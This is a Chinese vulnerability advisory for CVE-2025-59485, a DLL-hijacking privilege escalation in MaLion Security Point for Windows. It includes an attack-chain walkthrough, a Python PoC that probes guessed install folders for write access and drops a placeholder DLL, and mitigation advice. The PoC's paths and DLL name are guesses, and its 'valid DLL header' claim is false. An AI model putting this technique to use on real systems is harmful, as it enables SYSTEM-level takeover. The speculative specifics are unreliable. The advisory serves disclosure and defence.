MaLion Security Point Windows版 Ver.5.3.4前默认权限漏洞导致DLL劫持

漏洞信息

漏洞编号

CVE-2025-59485

漏洞类型

权限提升/DLL劫持

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MaLion Security Point (Windows)

漏洞概述

MaLion Security Point是日本Intercom公司开发的一款企业级安全监控软件，主要用于Windows环境的终端安全防护。该产品在Ver.5.3.4之前版本中存在不正确默认权限配置问题，攻击者可以通过本地低权限账户利用此漏洞在系统特定文件夹中放置任意文件。由于该软件以SYSTEM权限运行服务，当加载攻击者精心构造的恶意DLL文件时，可实现以SYSTEM高权限执行任意代码，从而完成权限提升攻击。此漏洞属于本地攻击范畴，攻击者需要拥有有效的系统登录凭证，CVSS评分3.3，属于低危级别。虽然评分较低，但若被成功利用，将导致系统完全沦陷，建议相关用户尽快更新到修复版本。

技术细节

该漏洞的根本原因在于MaLion Security Point Windows客户端在安装或运行时，对特定文件夹设置了过于宽松的权限。具体表现为：安装目录下的某个子文件夹（如临时文件夹或配置文件夹）允许本地低权限用户进行写入操作。攻击者利用此权限配置失误，可以将精心构造的恶意DLL文件写入该文件夹。当MaLion服务重新启动或触发特定功能时，系统会从该路径加载DLL文件。由于MaLion服务以SYSTEM高权限账户运行，加载的恶意DLL也将以SYSTEM权限执行，从而实现权限提升。攻击者需要先通过正常渠道获取目标系统的低权限账户登录凭证，然后利用文件写入权限将恶意DLL放置到指定位置，最后通过触发服务重启或特定功能来促使DLL被加载执行。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的低权限用户账户凭证（如通过钓鱼、社会工程学或其他方式）

STEP 2

步骤2

攻击者登录系统，识别MaLion Security Point的安装路径和存在权限配置问题的文件夹

STEP 3

步骤3

攻击者将精心构造的恶意DLL文件写入具有写入权限的特定文件夹（如temp或config目录）

STEP 4

步骤4

攻击者等待MaLion服务重启或触发特定功能，导致服务加载恶意DLL文件

STEP 5

步骤5

恶意DLL以SYSTEM高权限执行，完成权限提升，攻击者获得系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-59485 PoC - MaLion Security Point DLL Hijacking
# This PoC demonstrates the permission issue that allows placing arbitrary files

import os
import shutil
import time

def check_vulnerable_path(base_path):
    """Check if the target path has insecure permissions"""
    test_file = os.path.join(base_path, "test_write_permission.txt")
    try:
        with open(test_file, 'w') as f:
            f.write("test")
        os.remove(test_file)
        return True
    except PermissionError:
        return False

def create_malicious_dll(output_path):
    """
    Generate a malicious DLL that will execute code with SYSTEM privileges
    This is a template - actual DLL would contain malicious payload
    """
    dll_content = b'MZ' + b'\x00' * 50  # Minimal valid DLL header
    dll_path = os.path.join(output_path, "MaLionModule.dll")
    
    with open(dll_path, 'wb') as f:
        f.write(dll_content)
    
    print(f"[+] Malicious DLL created at: {dll_path}")
    return dll_path

def main():
    # Target paths that may have insecure permissions
    target_paths = [
        r"C:\Program Files\MaLion\temp",
        r"C:\Program Files\MaLion\config",
        r"C:\ProgramData\MaLion\temp",
        r"C:\Users\Public\MaLion"
    ]
    
    print("[*] CVE-2025-59485 - MaLion Security Point DLL Hijacking")
    print("[*] Checking for vulnerable paths...")
    
    for path in target_paths:
        if os.path.exists(path):
            print(f"[+] Found MaLion directory: {path}")
            if check_vulnerable_path(path):
                print(f"[!] VULNERABLE: {path} is writable by current user")
                create_malicious_dll(path)
            else:
                print(f"[*] Path not writable: {path}")

if __name__ == "__main__":
    main()

影响范围

MaLion Security Point (Windows) < Ver.5.3.4

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1)限制用户对MaLion安装目录的写入权限；2)启用Windows AppLocker或Windows Defender Application Control (WDAC)限制未授权DLL加载；3)监控系统日志，关注MaLion服务异常重启行为；4)考虑暂时禁用MaLion的非必要功能以降低攻击面；5)对MaLion相关文件夹实施文件完整性监控(FIM)，检测未授权文件创建行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59485
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59485
3 Details https://www.cvedetails.com/cve/CVE-2025-59485/
4 VulDB https://vuldb.com/cve/CVE-2025-59485
5 Link https://jvn.jp/en/jp/JVN76298784/
6 Link https://www.intercom.co.jp/information/2025/1125.html